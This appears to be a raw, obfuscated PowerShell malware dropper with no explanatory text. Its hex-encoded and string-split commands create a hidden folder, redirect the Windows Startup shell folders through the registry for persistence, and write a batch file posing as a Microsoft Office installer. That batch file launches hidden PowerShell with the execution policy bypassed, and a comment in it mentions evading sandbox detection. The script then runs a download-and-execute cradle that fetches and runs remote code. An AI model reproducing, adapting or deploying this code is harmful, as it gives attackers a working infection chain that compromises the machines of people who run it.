$HxB = "5b @3 @9 @3 @4 #5 #d 2e #9 #f 2e #4 #9 @2 #5 #3 @4 #f @2 @9 5d 3a 3a 43 @2 #5 #1 @4 #5 44 #9 @2 #5 #3 @4 #f @2 @9 28 22 43 3a 5c 50 @2 #f #@ @2 #1 #d 44 #1 @4 #1 5c 58 58 58 22 29 0a @3 @4 #1 @2 @4 2d @3 #c #5 #5 @0 20 2d @3 20 35 0a 53 #5 @4 2d 49 @4 #5 #d 50 @2 #f @0 #5 @2 @4 @9 20 2d 50 #1 @4 #8 20 22 48 4b 43 55 3a 5c 53 #f ## @4 @@ #1 @2 #5 5c 4d #9 #3 @2 #f @3 #f ## @4 5c 5@ #9 #e #4 #f @@ @3 5c 43 @5 @2 @2 #5 #e @4 5# #5 @2 @3 #9 #f #e 5c 45 @8 @0 #c #f @2 #5 @2 5c 55 @3 #5 @2 20 53 #8 #5 #c #c 20 4# #f #c #4 #5 @2 @3 22 20 2d 4e #1 #d #5 20 22 53 @4 #1 @2 @4 @5 @0 22 20 2d 5# #1 #c @5 #5 20 22 43 3a 5c 50 @2 #f #@ @2 #1 #d 44 #1 @4 #1 5c 58 58 58 22 3b 0a 53 #5 @4 2d 49 @4 #5 #d 50 @2 #f @0 #5 @2 @4 @9 20 2d 50 #1 @4 #8 20 22 48 4b 43 55 3a 5c 53 #f ## @4 @@ #1 @2 #5 5c 4d #9 #3 @2 #f @3 #f ## @4 5c 5@ #9 #e #4 #f @@ @3 5c 43 @5 @2 @2 #5 #e @4 5# #5 @2 @3 #9 #f #e 5c 45 @8 @0 #c #f @2 #5 @2 5c 53 #8 #5 #c #c 20 4# #f #c #4 #5 @2 @3 22 20 2d 4e #1 #d #5 20 22 53 @4 #1 @2 @4 @5 @0 22 20 2d 5# #1 #c @5 #5 20 22 43 3a 5c 50 @2 #f #@ @2 #1 #d 44 #1 @4 #1 5c 58 58 58 22 3b 0a @3 @4 #1 @2 @4 2d @3 #c #5 #5 @0 20 2d @3 20 35".replace("#","6").replace("@","7")
$acc = "+++T+++o+++U+++I+++n+++t+++3+++2+++".Replace("+++","")
$ax = "+++[+++c+++o+++n+++v+++e+++r+++t+++]+++".Replace("+++","")
$axx = ($ax -Join '')|&($env:ComSpec[4,26,25]-join'')
$aa = {[char]$axx::$acc($_,16)}
$HxBB= $HxB -split ' ' |ForEach-Object $aa 
($HxBB -Join '')|&($env:ComSpec[4,26,25]-join'')
start-sleep -s 3
$FFF = @'
@echo off
echo [+] Please Wait, Installing Microsoft Office...
:: writte file to disk to evade sandbox detection
echo microsoft > %userprofile%\\license.pem
:: local variable declarations
sEt !h=e&& sEt U7=n&& sEt k8=d&& sEt db=P
@c^M%k8%.E"x"%!h% /c =%db%oW%!h%rS^h%!h%lL"."%!h%Xe -%U7%o%!h% -%U7%op -%U7%o%U7%I -WI%U7%%k8%oWSTYL%!h% Hi%k8%%k8%%!h%%U7% -%!h%x%!h%cutio%U7%Policy Bypass -fil%!h% C:\Us%!h%rs\Public\%k8%ow%U7%loa%k8%s\HBar.ps1
exit
'@
Set-Content -Path C:\ProgramData\XXX\XXX.BAT -Value $FFF

start-sleep -s 3
$AAA = @'
$Hx = 'WR.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.Replace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.Replace('**********',''),'++++++++++D++++++++++o++++++++++w++++++++++n++++++++++'.Replace('++++++++++',''));$HBB=('{2}{0}{1}' -f'---------e---------b---------C---------l---------'.Replace('---------',''),'---------i---------e---------n---------t---------'.Replace('---------',''),'---------Ne---------t---------.W---------'.Replace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-O------b------j------e------c------t  $------H------'.Replace('------',''),'------BB------).$H------B(------$H------x)------'.Replace('------',''),'------I------`E------`X(------Ne------'.Replace('------',''));$HBBBBB = ($HBBB -Join '')|InVokE-ExpresSioN
'@
Set-Content -Path C:\Users\Public\Downloads\HBar.ps1 -Value $AAA

start-sleep -s 3

$Hx = 'WR.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.Replace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.Replace('**********',''),'++++++++++D++++++++++o++++++++++w++++++++++n++++++++++'.Replace('++++++++++',''));$HBB=('{2}{0}{1}' -f'---------e---------b---------C---------l---------'.Replace('---------',''),'---------i---------e---------n---------t---------'.Replace('---------',''),'---------Ne---------t---------.W---------'.Replace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-O------b------j------e------c------t  $------H------'.Replace('------',''),'------BB------).$H------B(------$H------x)------'.Replace('------',''),'------I------`E------`X(------Ne------'.Replace('------',''));$HBBBBB = ($HBBB -Join '')|InVokE-ExpresSioN